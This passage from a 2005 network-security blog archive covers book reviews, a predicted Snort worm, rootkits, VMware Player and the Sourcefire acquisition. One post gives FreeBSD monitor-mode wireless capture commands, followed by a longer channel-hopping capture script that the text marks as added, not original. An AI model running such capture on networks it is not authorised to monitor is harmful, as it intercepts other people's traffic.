This disaster shows how humans can never be removed from the equation, and they are often at center stage when failures occur. The commentator on the show said a 10 cent light bulb illuminating the radar controls station could have shown the radar range was positioned in a setting different from that assumed by the operator. Following the Andrea Doria collision, illumination was added to ship radar controls. This story reminded me that the latest security technology is worthless -- or even worse, damaging -- in the hands of people who are not trained or able to use it properly.

On a different subject, I heard an interview on NPR with Health and Human Services Secretary Mike Leavitt about bird flu. He likened the situation to "surveillance" of a dry forest during fire season. He said that the best defense was vigilance and rapid response. His analogy assumed being nearby when a small fire erupts. First responders who are quickly on the scene can stamp out a fire before it becomes uncontrollable. If the response team is unaware of the fire, it can spread and then be beyond containment. He concluded the interview saying "ultimately, another pandemic will come. Right now we are not prepared."

I thought his comments applied well to digital security incidents. NSM is surveillance, and incident response helps stamp out fires (or bird flu outbreaks) quickly before they exceed an organization's capacity to deal with them. Is your organization ready? If you want to know, TaoSecurity provides services like incident response training and CSIRT assessments and evaluations.

Pre-Review Postscript

I neglected to mention a book I look forward to reading -- Essential SNMP, 2nd Ed by Douglas Mauro and Kevin Schmidt. Most of the technologies I deploy and use are passive monitoring systems. This book represents an active monitoring system, where SNMP is used to determine the status of network resources. I expect Wolfgang Barth's book on Nagios to also be helpful.

Since I mentioned the new Apress MySQL book yesterday, MySQL 5 has achieved general availability status with version 5.0.15. I expect the FreeBSD port will be updated shortly.

Bejtlich Speaking at RSA Conference 2006

My proposal to speak at the RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensics.

Sunday, October 23, 2005

Latest Book Pre-Reviews

During the last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over the last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review them for Amazon.com.

First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and anyone pursuing an advanced Cisco certification (beyond the CCNA). I may read the first 350 pages, as the chapters in that half of the book each address a topic of interest, like IP routing or QoS. The last half of the book is a command syntax reference.

Windows Server 2003 Network Administration by Craig Hunt and Roberta Bragg is sitting in my reference section next to O'Reilly's Learning Windows Server 2003 and Windows Server Cookbook. The book appears to be a comprehensive overview of networking services from a Microsoft perspective. Next I turn to books I plan to read and review.

Beginning Python by Magnus Lie Hetland is an update of his 2002 book Practical Python. I originally tried to learn Python by reading Learning Python, 2nd Ed in early 2004, but I bailed on that book after a few chapters. I am really excited to try again with Magnus' book. I consider it to be the gateway to a series of other excellent Apress Python books like Dive Into Python and Foundations of Python Network Programming, which I plan to read. (I hope O'Reilly's Python Cookbook, 2nd Ed will be a good addition to this trio.) I plan to read this book as part of my programming education, which will start once I clear the books which follow.

Ben Rothke sent me a copy of his updated book Computer Security 20 Things Every Employee Should Know, 2nd Ed. This is a booklet that would be appropriate as part of digital security awareness campaign in a company of any size. After skimming through it, the advice seems sound and I would have no problem recommending the book to clients.

The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer is Symantec's latest foray into the security publishing world. This is a fairly short book, which makes sense given the level of interest and expertise of the intended audience. I would be pleased with it if I could imagine sending it to my parents -- maybe with a copy of FreeBSD? (Probably not!)

VMware Workstation 5 Handbook by Steven S. Warren is a new book from Charles River Media. I had this book on my Amazon.com Wish List for months before I bought a copy at a local Borders. A few days later the publisher shipped me one! They must have read my wish list. This book looks like a thorough and easy-to-read overview of Workstation features. With the introduction of Teams, Snapshots, Clones, and other advances over the 3.x and 4.x lines, I look forward to learning how to make the best use of VMware in my classes and in testing scenarios.

I have not abandoned plans for a TaoSecurity Podcast. I hope two books can give me advice on how best to proceed. The first I plan to read is Todd Cochrane's Podcasting: A Do-It-Yourself Guide, published by Wiley. This was one of the first podcasting books to appear that got reasonable Amazon.com reviews. I hope to gain some insights on how best to create podcasts using minimal equipment.

Shortly after I received a copy of the previous book, I learned of Jack Herrington's Podcasting Hacks. The O'Reilly Hacks series usually contain lots of good advice, but the format is seldom read cover-to-cover. It's more an assortment of helpful tips and tools.

Three books from Syngress are next. First is Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools by Christian B. Lahti and Roderick Peterson. I will admit up front that I will bail on this book unless it hooks me. I am not a regulatory compliance person, but I would like to learn a little more about SOX and COBIT. I would like this book to provide the background I need to understand these issues.

Software Piracy Exposed by Paul Craig and Ron Honick will be good if it follows in the footsteps of an earlier Syngress book, Inside the Spam Cartel. I don't know much about modern software piracy, so I thought this book might provide a glimpse into that threat sector.

Nessus, Snort, & Ethereal Power Tools: Customizing Open Source Security Applications by Brian Caswell, Gilbert Ramirez, Jay Beale, Noam Rathaus and Neil Archibald looks like a great book. The only existing review on Amazon.com (3 stars) complains "Very in-depth, however, not for someone who is just starting out on Snort, Nessus, or Ethereal. New to Snort, Nessus, or Ethereal - Buy something else." Does every book have to assume a newbie audience? Of course not -- state the prerequisite knowledge up front, and press on!

The Definitive Guide to MySQL 5, 3rd Ed by Michael Kofler looks like a great overview of features found in MySQL 5, which is currently a release candidate at version 5.0.13. The "generally available" version is 4.1.15, which is the one people are most likely encouraged to use in production. Once MySQL 5 leaves RC status, I plan to incorporate it into my Sguil Installation Guide, along with FreeBSD 6.0 and Sguil 0.6.0. All three components should be ready within the next several weeks.

After years of no publications about Debian, this year has seen two books about that Linux distro. First was Wiley's Debian GNU/Linux 3.1 Bible by David B. Harris and Jaldhar Vyas. Now we have No Starch's The Debian System by Martin F. Krafft. I am much more willing to devote time to a new operating system when it is backed by books. Online documentation is fine, but a published book is something I can recommend to others in a physical form. It carries much more weight (literally) than online documentation. I plan to evaluate how I might integrate Debian into my lab, although I already have it running on a PA-RISC box that normally hosts HP-UX.

Finally we arrive at Security and Usability, a collection of essays edited by Lorrie Faith Cranor and Simson Garfinkel. I think this is the sort of book I might read on a cross-US flight. I am not a big fan of collections of essays, but in a captive environment (i.e., stuck on a plane) I might find sanctuary in the ideas contained in this book.

So that's a ton of new books. My personal reading list currently shows 24 non-programming and 24 programming books on my bookshelf. That does not count reference books that I have pre-reviewed but do not plan to read cover-to-cover. My Amazon.com Wish List shows another 21 books on the horizon that appear interesting. Since I do not have any new major writing projects planned for the next year, I would like to make progress on all of this reading. Stay tuned to my Amazon.com Reviews as I read and review the titles seen here and elsewhere. Thank you!

Saturday, October 22, 2005

Further Thoughts on Engineering Disasters

My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of the show of the same title took a broader look at the problem. Three experts provided comments that resonated with me.

First, Dr. Roger McCarthy of Exponent, Inc. offered the following story about problems with the Hubble Space Telescope. When Hubble was built, engineers did not sufficiently account for how the weight of the lens deflected it under Earth's gravity. Once Hubble was in orbit, the lens no longer deflected, and as a result it was not the proper shape. Engineers had never tested the lens on Earth because they could not figure out a way to do it.

So, they launched and hoped for the best -- only to encounter a disaster that required a $50 million orbital repair mission. Dr. McCarthy's comment was "A single test is worth a thousand expert opinions." This is an example of management by fact instead of management by belief, mentioned previously on this blog.

Second, Dr. Charles Perrow, author of Normal Accidents: Living With High-Risk Technologies, explained the makings of a disaster. Essentially, he said disasters are caused by the unforeseen consequences of multiple, individually non-devastating, failures in complex systems. Most catastrophes could be prevented if any one of the small failures had not occurred.

Third, Mary Schiavo commented on the Challenger disaster. She described the well-known problems with operating the Shuttle's rocket O-rings in temperatures below 53 degrees F. The Shuttle had launched at lower temperatures prior to the Challenger explosion, but NASA knew they were risking catastrophe. Ms. Schiavo said NASA engineers begged their managers not to let Challenger launch, seeing that chunks of ice covered the launch pad and Shuttle. They were overruled and disaster occurred.

This struck a chord with me, because a few days earlier I read a news story in Time about how Steve Jobs gets Apple to bring innovative products to market:

Apple CEO Steve Jobs [will] tell you an instructive little story. Call it the Parable of the Concept Car. "Here's what you find at a lot of companies," he says, kicking back in a conference room at Apple's gleaming white Silicon Valley headquarters, which looks something like a cross between an Ivy League university and an iPod. "You know how you see a show car, and it's really cool, and then four years later you see the production car, and it sucks? And you go, What happened? They had it! They had it in the palm of their hands! They grabbed defeat from the jaws of victory!

"What happened was, the designers came up with this really great idea. Then they take it to the engineers, and the engineers go, 'Nah, we can't do that. That's impossible.' And so it gets a lot worse. Then they take it to the manufacturing people, and they go, 'We can't build that!' And it gets a lot worse."

When Jobs took up his present position at Apple in 1997, that's the situation he found. He and Jonathan Ive, head of design, came up with the original iMac, a candy-colored computer merged with a cathode-ray tube that, at the time, looked like nothing anybody had seen outside of a Jetsons cartoon. "Sure enough," Jobs recalls, "when we took it to the engineers, they said, 'Oh.' And they came up with 38 reasons. And I said, 'No, no, we're doing this.' And they said, 'Well, why?' And I said, 'Because I'm the CEO, and I think it can be done.'"


Would Steve Jobs have overruled the NASA engineers and launched Challenger? Who knows.

From what I have learned, disasters are prone to happen in complex, tightly-coupled systems. The only way to try to avoid them is to test and monitor their operation, exercise response, and then implement those plans when catastrophe occurs. Anything less is like launching a defective, untested Hubble and hoping for the best, and then paying through the nose to clean up the mess.

Here are a few footnotes to this post. Dr. McCarthy's company offers security engineering services, including services for information systems. They are described thus: "We have assembled one of the largest private collections of computerized accident and incident data in the world. Our web-based solutions put this information at your disposal, giving you comprehensive risk data quickly and at low cost." Dr. McCarthy was recently elected to the National Academy of Engineering, which has a Computer Science and Telecommunications Board with an Improving Cybersecurity Research in the United States project. My research for this story also led me to the System Safety Society.

Excellent Pf Documentation

I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like the approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and then builds up the capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document.

Incidentally, OpenBSD 3.8 will be available at an FTP server near you on 1 November.

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort versions 2.4.0, 2.4.1, and 2.4.2. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.

I am sure ISS is still bitter over the Witty worm, which revealed the installed ISS RealSecure and BlackIce user base to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed UDP source port of 4000.

Let's consider the factors that lead me to believe that the Snort BO vulnerability will produce a worm.

  1. The new vulnerability can be exploited by a specially crafted UDP packet to or from any port other than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to the UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.

  2. Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about the target's management IP address.

  3. Snort has been in the news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.

  4. Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders the ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn the exploit into a worm.

  5. Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means the vulnerability can be quickly identified.


I can imagine a few factors that will reduce the likelihood of a worm.

  1. The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; they complain about rules that don't work with their versions. Argh!

  2. Snort runs on a huge number of platforms. That is one of the beauties of the program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make the most sense -- the OS would be fairly similar, and the user base would make for good targets. We'll see.

  3. Sophisticated intruders will keep any exploit to themselves. They may try to keep it out of the hands of the bottom feeders.


What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.

On a related note, be sure to upgrade to Ethereal 0.10.13 -- 0.10.12 has bugs too.

Friday, October 21, 2005

VMware Player Changes Everything

In the words of the immortal Joey -- "whoa." I just learned of, and tried, the new VMware Player. If you haven't heard of it yet, VMware Player is a free program for Windows and Linux users that allows them to run a single VM on their host OS. VMware Player is like a stripped-down version of VMware Workstation. It does not support snapshots, and the documentation says only one VM can run at a time (despite what the comparison chart implies).

This changes everything. Everyone who is an end user of VMs (not a creator) just saved $189 for a VMware Workstation license. This includes students who use VMware on their class desktops or laptops. Authors can now distribute VMs with books (like a second edition of Real Digital Forensics?) and have readers access those VMs with the free VMware Player.

I tried one of the freely available images in the Virtual Machine Center -- the Browser-Appliance. As you can see from the screen shot below, it's an Ubuntu Linux distro.

I have not tried any of the innovative hacks involving VM files, but I would like to evaluate them. I'm considering building a VM of a complete Sguil installation using FreeBSD 6.0 and Sguil 0.6.0 when they are available. This approach easily avoids the problems with building and maintaining live CDs!

I applaud VMware for providing this program at no cost. It is obviously an attempt to build market share and direct attention away from Microsoft's product. (The two were compared in a recent NWC review.)

How do you plan to use VMware Player?

VirtualWiFi and Monitoring

While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:

orr:/root# ifconfig wi0 mediaopt monitor channel 6 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information header)
orr:/root# tcpdump -n -i wi0 -y IEEE802_11

One of the students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because the channel to monitor must be specified as shown above. An alternative requires running multiple wireless NICs.

I just learned of Microsoft's VirtualWiFi research project. This is a continuation of Ranveer Chandra's work on MultiNet. If VirtualWiFi supports putting a wireless NIC into monitor mode on Windows, it is possible to virtualize the NIC for as many channels as one wishes to monitor. Separate WinDump instances could sniff each virtual NIC. If anyone wishes to try this, please share your results in a comment.
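A single NIC can also approximate channel hopping if a script retunes it in a loop, listening on each channel for a fixed dwell time and writing one capture file per channel. The script below is an added example, not from the original post, built on the ifconfig and tcpdump syntax shown above; it assumes a wi(4) card named wi0 that accepts "mediaopt monitor channel N", and the capture directory /nsm/wifi is a hypothetical placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): channel-hopping 802.11 capture
# with one wireless NIC on FreeBSD, using the ifconfig/tcpdump syntax in the post.
# Assumptions: wi0 is a wi(4) card accepting "mediaopt monitor channel N", and
# tcpdump supports -y IEEE802_11. The capture loop needs root; start it with RUN_HOP=1.

IFACE="${IFACE:-wi0}"          # wireless interface, as in the post
CHANNELS="${CHANNELS:-1 6 11}" # non-overlapping 2.4 GHz channels to cycle through
DWELL="${DWELL:-10}"           # seconds to listen on each channel before retuning
OUTDIR="${OUTDIR:-/nsm/wifi}"  # hypothetical capture directory

# next_channel LIST CURRENT: print the channel after CURRENT in the
# space-separated LIST, wrapping to the first channel at the end of the list
# (or when CURRENT is not in the list at all).
next_channel() {
    list="$1"; cur="$2"; first=""; take_next=0
    for ch in $list; do
        [ -z "$first" ] && first="$ch"
        if [ "$take_next" -eq 1 ]; then
            echo "$ch"
            return 0
        fi
        [ "$ch" = "$cur" ] && take_next=1
    done
    echo "$first"
}

# capture_file CHANNEL EPOCH: name each per-channel capture so later analysis
# (tcpdump -r, Ethereal) can tell which channel a frame was captured on.
capture_file() {
    printf '%s/%s-ch%02d-%s.pcap\n' "$OUTDIR" "$IFACE" "$1" "$2"
}

# hop_once CHANNEL: retune the NIC, then record raw 802.11 frames for $DWELL
# seconds. tcpdump is backgrounded and killed after the dwell time, so no
# timeout(1) utility is required.
hop_once() {
    ch="$1"
    ifconfig "$IFACE" mediaopt monitor channel "$ch" up || return 1
    tcpdump -n -i "$IFACE" -y IEEE802_11 -w "$(capture_file "$ch" "$(date +%s)")" &
    pid=$!
    sleep "$DWELL"
    kill "$pid" 2>/dev/null
    wait "$pid" 2>/dev/null
    return 0
}

# Main loop: runs only when explicitly requested, since it needs root and a real NIC.
if [ "${RUN_HOP:-0}" = "1" ]; then
    mkdir -p "$OUTDIR"
    set -- $CHANNELS
    ch="$1"
    while :; do
        hop_once "$ch" || { echo "failed to tune $IFACE to channel $ch" >&2; exit 1; }
        ch=$(next_channel "$CHANNELS" "$ch")
    done
fi
```

Because the NIC is tuned to one channel at a time, frames on the other channels are missed during each dwell; that blind spot is the trade-off against running one NIC per channel or virtualizing the NIC as described above.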

Commercial Rootkits Make NSM Even More Relevant

Last month I posted Rootkits Make NSM More Relevant Than Ever. A few weeks ago I spoke at a Cisco training event attended by over 400 sales engineers and broadcast to several hundred more. I built my presentation on the "NSM, Now More Than Ever" theme. Since Cisco is a network infrastructure company, my message resonated with them. I would have delivered the same message to Microsoft if asked, but I am not a 31337 BlueHat h@x0r.

Today I learned through Tom Sanders' story Rootkit creators turn professional about Golden Hacker Defender (GHD). GHD is a modification of the freely available Windows userland rootkit Hacker Defender (HD) by holy_father. Buyers can customize HD to suit their needs, which usually involves evading detection.

For example, the ultimate form of HD is listed as Brilliant Hacker Defender Forever, shown in the following screen capture. The cost is 900 Euro, or 1,077.09 USD at today's rates.

Anti-virus company F-Secure brought this product to light in a recent blog posting. F-Secure's BlackLight product tries to detect rootkits; alternatives include RootkitRevealer by SysInternals and Microsoft's Strider Ghostbuster.

Blogger PABlo promises more coverage on rootkits, which I intend to follow.

Monday, October 17, 2005

Useful Nmap Documentation

Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently the new Nmap man page is an excerpt from this book.

By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not reviewed this book for technical content, but the table of contents looks interesting. Anyone who considers themselves to be a security or traffic analyst should be familiar with Nmap's workings. It is important to understand how all of the Nmap scans work and how they appear in traffic excerpts.

Sunday, October 16, 2005

Register for 20 October ISSA-NoVA Meeting by Noon Tuesday

To my DC metro area readers: if you'd like to attend the local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be there to hear Paco Hope discuss FreeBSD and OpenBSD.

Friday, October 14, 2005

MySpace Worm Demonstrates NSM Principles

In my first book, The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of these two facts, prevention eventually fails. In other words, intruders are cleverly finding ways to circumvent the security of services you have never heard of, in ways you could not imagine. As a result, defenses fail, and monitoring is the only way to detect that failure and respond appropriately.

The story Cross-Site Scripting Worm Hits MySpace is a perfect example of these principles in action. In short, someone figured out how to create a worm on the MySpace online community. More details are posted at this Slashdot thread.

I had never heard of MySpace until today, but over a million users were affected by this worm. Did you see this coming? Of course not. There is little point in forecasting future threats. The best we can do is to implement the best preventative defenses we can, monitor everything else, and respond in a timely manner.

Thursday, October 13, 2005

Bejtlich Quotes in Sourcefire Acquisition Story

Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:

Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.

"I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."


That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!

Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)

Wednesday, October 12, 2005

Brief Thought on Digital Security

I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had the following thought after writing that article.

When an engineering catastrophe befalls the "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc.

This is generally not the case in the digital world. It is possible for an enterprise to be completely owned by unauthorized parties without any overt signs. If one knows where to look, of course, indicators can be seen, and evidence of compromise can be gathered, analyzed, and escalated. This is the reason I advocate network security monitoring (NSM) and conducting traffic threat assessments (TTAs).

Tuesday, October 11, 2005

SecurityMetrics Documents Security Cycles

Andrew Jaquith of SecurityMetrics.org posted an interesting story called Hamster Wheels of Pain. It's a follow-up to an earlier article. I think the present story is cool because Andrew collected and posted the security process "wheels" of 11 security vendors.

I recognize Foundstone's in there, shown as a thumbnail at left.

I think Andrew is a little too cynical regarding some of these process charts. Some are used to sell products, and often reflect vendor biases. Others are just ways to break the security problem down into manageable chunks.

I use the diagram at right in my classes to emphasize the traffic-centric approach I take to network security operations. Does this make me bad? I doubt it.

BSD Certification Group Publishes BSD Associate Exam Objectives

Last week the BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of the document explains its purpose:

"This document introduces the BSD Associate (BSDA) examination and describes in considerable detail the objectives covered by the exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.

While the testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all the details of each one. A thorough reading of this document is recommended to understand which concepts and practical details are expected to be mastered.

Throughout this document, a clear distinction is placed on 'recognizing' and 'understanding', versus 'demonstrating' and 'performing'. Certain objectives call for the mere understanding of certain topics, while others call for the ability to demonstrate performance level knowledge of the topic...

Successful mastery of the BSDA examination will, in most cases, require study and practice. The requirements for the exam encompass more background in BSD than is common among casual users or those new to BSD. This is a deliberate decision by the BSD Certification Group- to encourage more cross learning among BSD systems so that breadth of understanding of BSD is as heavily tasked as depth of understanding. The result will be a more well-rounded BSD advocate and a more knowledgeable system administrator."

The objectives describe seven domains:

  1. Installing and Upgrading the OS and Software

  2. Securing the OS

  3. Files, Filesystems, and Disks

  4. Users and Accounts Management

  5. Basic System Administration

  6. Network Administration

  7. Basic Unix Skills


The document also describes the audience for the certification:

"The BSDA certification is designed to be an entry-level certification on BSD Unix systems administration. Testing candidates with a general Unix background, but less than six months of work experience as a BSD systems administrator (or who wish to obtain employment as a BSD systems administrator) will benefit most from this certification."

Also:

"[T]he BSDA certification is only valid for 5 years. Existing BSDAs who wish to maintain their certification will need to recertify every 5 years. Details on how to recertify will be publicly available in a document to be published in 2006."


I like this approach. I disagree that DragonFly BSD should be included, since something like 2% of all BSD administrators use DragonFly.

The guide is 57 pages long, so I will need time to read everything. At first glance it looks like great work.

Although I am still listed on the about us page, I have requested resignation as I have absolutely no time to work on the project while running TaoSecurity.

FreeBSD 6.0-RC1 Available

I just read the announcement that FreeBSD 6.0-RC1 is available for download. There's a helpful link on the new front page that points directly to places to find the new release candidate. The 6.0 schedule does not list a release date, but the RC1 announcement says RC1 will be the only release candidate. I expect to see 6.0-RELEASE arrive within the next two weeks. Great work FreeBSD release engineering team!

FreeBSD 5.5, at least one more upgrade to the existing 5.x tree, is scheduled for arrival in November. According to the security advisory schedule, FreeBSD 4.11 will enter end-of-life status on 31 January 2007. After that date no security fixes for the 4.x tree will be officially provided. Support for the 5.x tree will end earlier, 31 May 2006. I believe the FreeBSD team is trying to encourage 5.x users to migrate, and leave a window open for people who have been running 4.x for years.

TaoSecurity Blog on CNET Blog 100

I received word today that this blog was added to the CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking the last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CNET!

Saturday, October 08, 2005

New FreeBSD Web Site Launched

I like the look of the new FreeBSD home page, but the daemon in the middle looks obnoxiously large compared to the rest of the content. I'd much rather see Beastie small and somewhere else, preferably in a corner or on the community page. FreeBSD is an operating system for professionals; I'd like to see it treated seriously for once. On a related note, I found this interview with Scott Long very interesting.

Thoughts on the Week's Security News

This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.

I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various events. Obviously the biggest news of the week was Checkpoint's $225 million acquisition of Sourcefire.

In short, I didn't see that coming. I have doubts about the future of Snort being a free product, let alone open source. I don't see anyone making the case to the board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.

You may have seen how Checkpoint is treating users of the free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, the basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims the problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a theoretical attack that we don't see used in the real world." Great. That rationale has certainly stood the test of time (not).

However, I do not fault Sourcefire at all for being purchased. I never faulted them for the way they handled the new rules licensing, either. The amount of manpower and resources they devote to Snort is incredible, so I am happy to see them be rewarded. I am just not sure Checkpoint is the right fit, at least from where I stand. What are your thoughts?

Saturday, October 01, 2005

Real Digital Forensics and Shirts

This week I received a batch of TaoSecurity T-shirts for my Network Security Operations class. The back of the T-shirt is pictured at left. The front of the T-shirt shows the TaoSecurity logo.


I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit the publisher Addison-Wesley to review the table of contents, the preface, and also download the first chapter. It's a review of Windows live response.

I think you will really enjoy this book. I wrote it with Keith Jones and Curtis Rose from Red Cliff Consulting. The project was two, almost three years in the making. In the book we look at intrusions from the perspective of the file system, memory, and network activity. (Guess who handled the network side?) :) All of the evidence we analyze is included on a DVD shipped with the book.

You can get a better look at the cover in the photo at left. In addition to TaoSecurity T-shirts for my class students, I'm making TaoSecurity polo shirts. I wear these when consulting. Several people have asked if I will sell the T-shirts and polo shirts. I'm not promising anything, but if you're interested please post a comment. Incidentally, I'm not using Cafe Press; I found a good local dealer who has been providing excellent quality shirts.

Comment Verification Activated

Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting them all. This is the latest salvo in an escalating battle that started with intermittent spam comments several months ago. To try to reduce these automated attacks in the future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank you.